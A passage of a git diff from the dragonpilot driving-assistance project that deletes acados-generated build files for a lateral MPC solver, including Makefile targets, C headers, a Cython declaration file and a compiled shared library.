$(EX_SRC:.c=) - -# for target example_sim -EX_SIM_SRC= main_sim_lat.c -EX_SIM_OBJ := $(EX_SIM_SRC:.c=.o) -EX_SIM_EXE := $(EX_SIM_SRC:.c=) - -# combine model, sim and ocp object files -OBJ= -OBJ+= $(MODEL_OBJ) -OBJ+= $(SIM_OBJ) -OBJ+= $(OCP_OBJ) - -EXTERNAL_DIR= -EXTERNAL_LIB= - -INCLUDE_PATH = /data/openpilot/third_party/acados/include -LIB_PATH = /data/openpilot/third_party/acados/lib - -# preprocessor flags for make's implicit rules -CPPFLAGS+= -I$(INCLUDE_PATH) -CPPFLAGS+= -I$(INCLUDE_PATH)/acados -CPPFLAGS+= -I$(INCLUDE_PATH)/blasfeo/include -CPPFLAGS+= -I$(INCLUDE_PATH)/hpipm/include - - -# define the c-compiler flags for make's implicit rules -CFLAGS = -fPIC -std=c99 #-fno-diagnostics-show-line-numbers -g -# # Debugging -# CFLAGS += -g3 - -# linker flags -LDFLAGS+= -L$(LIB_PATH) - -# link to libraries -LDLIBS+= -lacados -LDLIBS+= -lhpipm -LDLIBS+= -lblasfeo -LDLIBS+= -lm -LDLIBS+= - -# libraries -LIBACADOS_SOLVER=libacados_solver_lat.so -LIBACADOS_OCP_SOLVER=libacados_ocp_solver_lat.so -LIBACADOS_SIM_SOLVER=lib$(SIM_SRC:.c=.so) - -# virtual targets -.PHONY : all clean - -#all: clean example_sim example shared_lib - -all: clean example_sim example -shared_lib: bundled_shared_lib ocp_shared_lib sim_shared_lib - -# some linker targets -example: $(EX_OBJ) $(OBJ) - $(CC) $^ -o $(EX_EXE) $(LDFLAGS) $(LDLIBS) - -example_sim: $(EX_SIM_OBJ) $(MODEL_OBJ) $(SIM_OBJ) - $(CC) $^ -o $(EX_SIM_EXE) $(LDFLAGS) $(LDLIBS) - -bundled_shared_lib: $(OBJ) - $(CC) -shared $^ -o $(LIBACADOS_SOLVER) $(LDFLAGS) $(LDLIBS) - -ocp_shared_lib: $(OCP_OBJ) $(MODEL_OBJ) - $(CC) -shared $^ -o $(LIBACADOS_OCP_SOLVER) $(LDFLAGS) $(LDLIBS) \ - -L$(EXTERNAL_DIR) -l$(EXTERNAL_LIB) - -sim_shared_lib: $(SIM_OBJ) $(MODEL_OBJ) - $(CC) -shared $^ -o $(LIBACADOS_SIM_SOLVER) $(LDFLAGS) $(LDLIBS) - - -# Cython targets -ocp_cython_c: ocp_shared_lib - cython \ - -o acados_ocp_solver_pyx.c \ - -I $(INCLUDE_PATH)/../interfaces/acados_template/acados_template \ - $(INCLUDE_PATH)/../interfaces/acados_template/acados_template/acados_ocp_solver_pyx.pyx \ - -I /data/openpilot/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code \ - -ocp_cython_o: ocp_cython_c - $(CC) $(ACADOS_FLAGS) -c -O2 \ - -fPIC \ - -o acados_ocp_solver_pyx.o \ - -I /usr/include/python3.8 \ - -I $(INCLUDE_PATH)/blasfeo/include/ \ - -I $(INCLUDE_PATH)/hpipm/include/ \ - -I $(INCLUDE_PATH) \ - -I /usr/local/pyenv/versions/3.8.10/lib/python3.8/site-packages/numpy/core/include \ - acados_ocp_solver_pyx.c \ - -ocp_cython: ocp_cython_o - $(CC) $(ACADOS_FLAGS) -shared \ - -o acados_ocp_solver_pyx.so \ - -Wl,-rpath=$(LIB_PATH) \ - acados_ocp_solver_pyx.o \ - $(abspath .)/libacados_ocp_solver_lat.so \ - $(LDFLAGS) $(LDLIBS) - -clean: - $(RM) $(OBJ) $(EX_OBJ) $(EX_SIM_OBJ) - $(RM) $(LIBACADOS_SOLVER) $(LIBACADOS_OCP_SOLVER) $(LIBACADOS_SIM_SOLVER) - $(RM) $(EX_EXE) $(EX_SIM_EXE) - -clean_ocp_shared_lib: - $(RM) $(LIBACADOS_OCP_SOLVER) - $(RM) $(OCP_OBJ) - -clean_ocp_cython: - $(RM) libacados_ocp_solver_lat.so - $(RM) acados_solver_lat.o - $(RM) acados_ocp_solver_pyx.so - $(RM) acados_ocp_solver_pyx.o diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so deleted file mode 100755 index 85db34226..000000000 Binary files a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/acados_ocp_solver_pyx.so and /dev/null differ diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/acados_sim_solver_lat.h b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/acados_sim_solver_lat.h deleted file mode 100644 index 86b9c84c9..000000000 --- a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/acados_sim_solver_lat.h +++ /dev/null @@ -1,103 +0,0 @@ -/* - * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, - * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, - * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, - * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl - * - * This file is part of acados. - * - * The 2-Clause BSD License - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE - * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF - * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS - * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN - * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE - * POSSIBILITY OF SUCH DAMAGE.; - */ - -#ifndef ACADOS_SIM_lat_H_ -#define ACADOS_SIM_lat_H_ - -#include "acados_c/sim_interface.h" -#include "acados_c/external_function_interface.h" - -#define LAT_NX 4 -#define LAT_NZ 0 -#define LAT_NU 1 -#define LAT_NP 2 - -#ifdef __cplusplus -extern "C" { -#endif - - -// ** capsule for solver data ** -typedef struct sim_solver_capsule -{ - // acados objects - sim_in *acados_sim_in; - sim_out *acados_sim_out; - sim_solver *acados_sim_solver; - sim_opts *acados_sim_opts; - sim_config *acados_sim_config; - void *acados_sim_dims; - - /* external functions */ - // ERK - external_function_param_casadi * sim_forw_vde_casadi; - external_function_param_casadi * sim_expl_ode_fun_casadi; - external_function_param_casadi * sim_expl_ode_hess; - - // IRK - external_function_param_casadi * sim_impl_dae_fun; - external_function_param_casadi * sim_impl_dae_fun_jac_x_xdot_z; - external_function_param_casadi * sim_impl_dae_jac_x_xdot_u_z; - external_function_param_casadi * sim_impl_dae_hess; - - // GNSF - external_function_param_casadi * sim_gnsf_phi_fun; - external_function_param_casadi * sim_gnsf_phi_fun_jac_y; - external_function_param_casadi * sim_gnsf_phi_jac_y_uhat; - external_function_param_casadi * sim_gnsf_f_lo_jac_x1_x1dot_u_z; - external_function_param_casadi * sim_gnsf_get_matrices_fun; - -} sim_solver_capsule; - - -ACADOS_SYMBOL_EXPORT int lat_acados_sim_create(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT int lat_acados_sim_solve(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT int lat_acados_sim_free(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT int lat_acados_sim_update_params(sim_solver_capsule *capsule, double *value, int np); - -ACADOS_SYMBOL_EXPORT sim_config * lat_acados_get_sim_config(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT sim_in * lat_acados_get_sim_in(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT sim_out * lat_acados_get_sim_out(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT void * lat_acados_get_sim_dims(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT sim_opts * lat_acados_get_sim_opts(sim_solver_capsule *capsule); -ACADOS_SYMBOL_EXPORT sim_solver * lat_acados_get_sim_solver(sim_solver_capsule *capsule); - - -ACADOS_SYMBOL_EXPORT sim_solver_capsule * lat_acados_sim_solver_create_capsule(void); -ACADOS_SYMBOL_EXPORT int lat_acados_sim_solver_free_capsule(sim_solver_capsule *capsule); - -#ifdef __cplusplus -} -#endif - -#endif // ACADOS_SIM_lat_H_ diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/acados_solver.pxd b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/acados_solver.pxd deleted file mode 100644 index 8397f8e9d..000000000 --- a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/acados_solver.pxd +++ /dev/null @@ -1,62 +0,0 @@ -# -# Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, -# Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, -# Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, -# Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl -# -# This file is part of acados. -# -# The 2-Clause BSD License -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# -# 1. Redistributions of source code must retain the above copyright notice, -# this list of conditions and the following disclaimer. -# -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE -# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF -# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS -# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN -# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) -# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -# POSSIBILITY OF SUCH DAMAGE.; -# - -cimport acados_solver_common - -cdef extern from "acados_solver_lat.h": - ctypedef struct nlp_solver_capsule "lat_solver_capsule": - pass - - nlp_solver_capsule * acados_create_capsule "lat_acados_create_capsule"() - int acados_free_capsule "lat_acados_free_capsule"(nlp_solver_capsule *capsule) - - int acados_create "lat_acados_create"(nlp_solver_capsule * capsule) - - int acados_create_with_discretization "lat_acados_create_with_discretization"(nlp_solver_capsule * capsule, int n_time_steps, double* new_time_steps) - int acados_update_time_steps "lat_acados_update_time_steps"(nlp_solver_capsule * capsule, int N, double* new_time_steps) - int acados_update_qp_solver_cond_N "lat_acados_update_qp_solver_cond_N"(nlp_solver_capsule * capsule, int qp_solver_cond_N) - - int acados_update_params "lat_acados_update_params"(nlp_solver_capsule * capsule, int stage, double *value, int np_) - int acados_solve "lat_acados_solve"(nlp_solver_capsule * capsule) - int acados_reset "lat_acados_reset"(nlp_solver_capsule * capsule) - int acados_free "lat_acados_free"(nlp_solver_capsule * capsule) - void acados_print_stats "lat_acados_print_stats"(nlp_solver_capsule * capsule) - - acados_solver_common.ocp_nlp_in *acados_get_nlp_in "lat_acados_get_nlp_in"(nlp_solver_capsule * capsule) - acados_solver_common.ocp_nlp_out *acados_get_nlp_out "lat_acados_get_nlp_out"(nlp_solver_capsule * capsule) - acados_solver_common.ocp_nlp_out *acados_get_sens_out "lat_acados_get_sens_out"(nlp_solver_capsule * capsule) - acados_solver_common.ocp_nlp_solver *acados_get_nlp_solver "lat_acados_get_nlp_solver"(nlp_solver_capsule * capsule) - acados_solver_common.ocp_nlp_config *acados_get_nlp_config "lat_acados_get_nlp_config"(nlp_solver_capsule * capsule) - void *acados_get_nlp_opts "lat_acados_get_nlp_opts"(nlp_solver_capsule * capsule) - acados_solver_common.ocp_nlp_dims *acados_get_nlp_dims "lat_acados_get_nlp_dims"(nlp_solver_capsule * capsule) - acados_solver_common.ocp_nlp_plan *acados_get_nlp_plan "lat_acados_get_nlp_plan"(nlp_solver_capsule * capsule) diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/acados_solver_lat.h b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/acados_solver_lat.h deleted file mode 100644 index 824df5467..000000000 --- a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/acados_solver_lat.h +++ /dev/null @@ -1,167 +0,0 @@ -/* - * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, - * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, - * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, - * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl - * - * This file is part of acados. - * - * The 2-Clause BSD License - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE - * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF - * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS - * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN - * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE - * POSSIBILITY OF SUCH DAMAGE.; - */ - -#ifndef ACADOS_SOLVER_lat_H_ -#define ACADOS_SOLVER_lat_H_ - -#include "acados/utils/types.h" - -#include "acados_c/ocp_nlp_interface.h" -#include "acados_c/external_function_interface.h" - -#define LAT_NX 4 -#define LAT_NZ 0 -#define LAT_NU 1 -#define LAT_NP 2 -#define LAT_NBX 2 -#define LAT_NBX0 4 -#define LAT_NBU 0 -#define LAT_NSBX 0 -#define LAT_NSBU 0 -#define LAT_NSH 0 -#define LAT_NSG 0 -#define LAT_NSPHI 0 -#define LAT_NSHN 0 -#define LAT_NSGN 0 -#define LAT_NSPHIN 0 -#define LAT_NSBXN 0 -#define LAT_NS 0 -#define LAT_NSN 0 -#define LAT_NG 0 -#define LAT_NBXN 0 -#define LAT_NGN 0 -#define LAT_NY0 3 -#define LAT_NY 3 -#define LAT_NYN 2 -#define LAT_N 16 -#define LAT_NH 0 -#define LAT_NPHI 0 -#define LAT_NHN 0 -#define LAT_NPHIN 0 -#define LAT_NR 0 - -#ifdef __cplusplus -extern "C" { -#endif - -// ** capsule for solver data ** -typedef struct lat_solver_capsule -{ - // acados objects - ocp_nlp_in *nlp_in; - ocp_nlp_out *nlp_out; - ocp_nlp_out *sens_out; - ocp_nlp_solver *nlp_solver; - void *nlp_opts; - ocp_nlp_plan_t *nlp_solver_plan; - ocp_nlp_config *nlp_config; - ocp_nlp_dims *nlp_dims; - - // number of expected runtime parameters - unsigned int nlp_np; - - /* external functions */ - // dynamics - - external_function_param_casadi *forw_vde_casadi; - external_function_param_casadi *expl_ode_fun; - - - - - // cost - - external_function_param_casadi *cost_y_fun; - external_function_param_casadi *cost_y_fun_jac_ut_xt; - external_function_param_casadi *cost_y_hess; - - - external_function_param_casadi cost_y_0_fun; - external_function_param_casadi cost_y_0_fun_jac_ut_xt; - external_function_param_casadi cost_y_0_hess; - - - - external_function_param_casadi cost_y_e_fun; - external_function_param_casadi cost_y_e_fun_jac_ut_xt; - external_function_param_casadi cost_y_e_hess; - - - // constraints - - - - -} lat_solver_capsule; - -ACADOS_SYMBOL_EXPORT lat_solver_capsule * lat_acados_create_capsule(void); -ACADOS_SYMBOL_EXPORT int lat_acados_free_capsule(lat_solver_capsule *capsule); - -ACADOS_SYMBOL_EXPORT int lat_acados_create(lat_solver_capsule * capsule); - -ACADOS_SYMBOL_EXPORT int lat_acados_reset(lat_solver_capsule* capsule); - -/** - * Generic version of lat_acados_create which allows to use a different number of shooting intervals than - * the number used for code generation. If new_time_steps=NULL and n_time_steps matches the number used for code - * generation, the time-steps from code generation is used. - */ -ACADOS_SYMBOL_EXPORT int lat_acados_create_with_discretization(lat_solver_capsule * capsule, int n_time_steps, double* new_time_steps); -/** - * Update the time step vector. Number N must be identical to the currently set number of shooting nodes in the - * nlp_solver_plan. Returns 0 if no error occurred and a otherwise a value other than 0. - */ -ACADOS_SYMBOL_EXPORT int lat_acados_update_time_steps(lat_solver_capsule * capsule, int N, double* new_time_steps); -/** - * This function is used for updating an already initialized solver with a different number of qp_cond_N. - */ -ACADOS_SYMBOL_EXPORT int lat_acados_update_qp_solver_cond_N(lat_solver_capsule * capsule, int qp_solver_cond_N); -ACADOS_SYMBOL_EXPORT int lat_acados_update_params(lat_solver_capsule * capsule, int stage, double *value, int np); -ACADOS_SYMBOL_EXPORT int lat_acados_solve(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT int lat_acados_free(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT void lat_acados_print_stats(lat_solver_capsule * capsule); - -ACADOS_SYMBOL_EXPORT ocp_nlp_in *lat_acados_get_nlp_in(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT ocp_nlp_out *lat_acados_get_nlp_out(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT ocp_nlp_out *lat_acados_get_sens_out(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT ocp_nlp_solver *lat_acados_get_nlp_solver(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT ocp_nlp_config *lat_acados_get_nlp_config(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT void *lat_acados_get_nlp_opts(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT ocp_nlp_dims *lat_acados_get_nlp_dims(lat_solver_capsule * capsule); -ACADOS_SYMBOL_EXPORT ocp_nlp_plan_t *lat_acados_get_nlp_plan(lat_solver_capsule * capsule); - -#ifdef __cplusplus -} /* extern "C" */ -#endif - -#endif // ACADOS_SOLVER_lat_H_ diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_fun.h b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_fun.h deleted file mode 100644 index 842fc03df..000000000 --- a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_0_fun.h +++ /dev/null @@ -1,69 +0,0 @@ -/* - * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, - * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, - * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, - * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl - * - * This file is part of acados. - * - * The 2-Clause BSD License - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE - * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF - * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS - * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN - * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE - * POSSIBILITY OF SUCH DAMAGE.; - */ - - -#ifndef lat_Y_0_COST -#define lat_Y_0_COST - -#ifdef __cplusplus -extern "C" { -#endif - - -int lat_cost_y_0_fun(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_cost_y_0_fun_work(int *, int *, int *, int *); -const int *lat_cost_y_0_fun_sparsity_in(int); -const int *lat_cost_y_0_fun_sparsity_out(int); -int lat_cost_y_0_fun_n_in(void); -int lat_cost_y_0_fun_n_out(void); - -int lat_cost_y_0_fun_jac_ut_xt(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_cost_y_0_fun_jac_ut_xt_work(int *, int *, int *, int *); -const int *lat_cost_y_0_fun_jac_ut_xt_sparsity_in(int); -const int *lat_cost_y_0_fun_jac_ut_xt_sparsity_out(int); -int lat_cost_y_0_fun_jac_ut_xt_n_in(void); -int lat_cost_y_0_fun_jac_ut_xt_n_out(void); - -int lat_cost_y_0_hess(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_cost_y_0_hess_work(int *, int *, int *, int *); -const int *lat_cost_y_0_hess_sparsity_in(int); -const int *lat_cost_y_0_hess_sparsity_out(int); -int lat_cost_y_0_hess_n_in(void); -int lat_cost_y_0_hess_n_out(void); - - -#ifdef __cplusplus -} /* extern "C" */ -#endif - -#endif // lat_Y_0_COST diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_fun.h b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_fun.h deleted file mode 100644 index 9e444b984..000000000 --- a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/lat_cost/lat_cost_y_e_fun.h +++ /dev/null @@ -1,69 +0,0 @@ -/* - * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, - * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, - * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, - * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl - * - * This file is part of acados. - * - * The 2-Clause BSD License - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE - * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF - * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS - * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN - * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE - * POSSIBILITY OF SUCH DAMAGE.; - */ - - -#ifndef lat_Y_E_COST -#define lat_Y_E_COST - -#ifdef __cplusplus -extern "C" { -#endif - - -int lat_cost_y_e_fun(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_cost_y_e_fun_work(int *, int *, int *, int *); -const int *lat_cost_y_e_fun_sparsity_in(int); -const int *lat_cost_y_e_fun_sparsity_out(int); -int lat_cost_y_e_fun_n_in(void); -int lat_cost_y_e_fun_n_out(void); - -int lat_cost_y_e_fun_jac_ut_xt(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_cost_y_e_fun_jac_ut_xt_work(int *, int *, int *, int *); -const int *lat_cost_y_e_fun_jac_ut_xt_sparsity_in(int); -const int *lat_cost_y_e_fun_jac_ut_xt_sparsity_out(int); -int lat_cost_y_e_fun_jac_ut_xt_n_in(void); -int lat_cost_y_e_fun_jac_ut_xt_n_out(void); - -int lat_cost_y_e_hess(const real_t** arg, real_t** res, int* iw, real_t* w, void *mem); -int lat_cost_y_e_hess_work(int *, int *, int *, int *); -const int *lat_cost_y_e_hess_sparsity_in(int); -const int *lat_cost_y_e_hess_sparsity_out(int); -int lat_cost_y_e_hess_n_in(void); -int lat_cost_y_e_hess_n_out(void); - - -#ifdef __cplusplus -} /* extern "C" */ -#endif - -#endif // lat_Y_E_COST diff --git a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_model.h b/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_model.h deleted file mode 100644 index 98ed49214..000000000 --- a/selfdrive/dragonpilot/controls_0813/lib/lateral_mpc_lib/c_generated_code/lat_model/lat_model.h +++ /dev/null @@ -1,74 +0,0 @@ -/* - * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, - * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, - * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, - * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl - * - * This file is part of acados. - * - * The 2-Clause BSD License - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, - * this list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE - * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF - * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS - * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN - * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE - * POSSIBILITY OF SUCH DAMAGE.; - */ - -#ifndef lat_MODEL -#define lat_MODEL - -#ifdef __cplusplus -extern "C" { -#endif - - -/* explicit ODE */ - -// explicit ODE -int lat_expl_ode_fun(const real_t** arg, real_t** res, 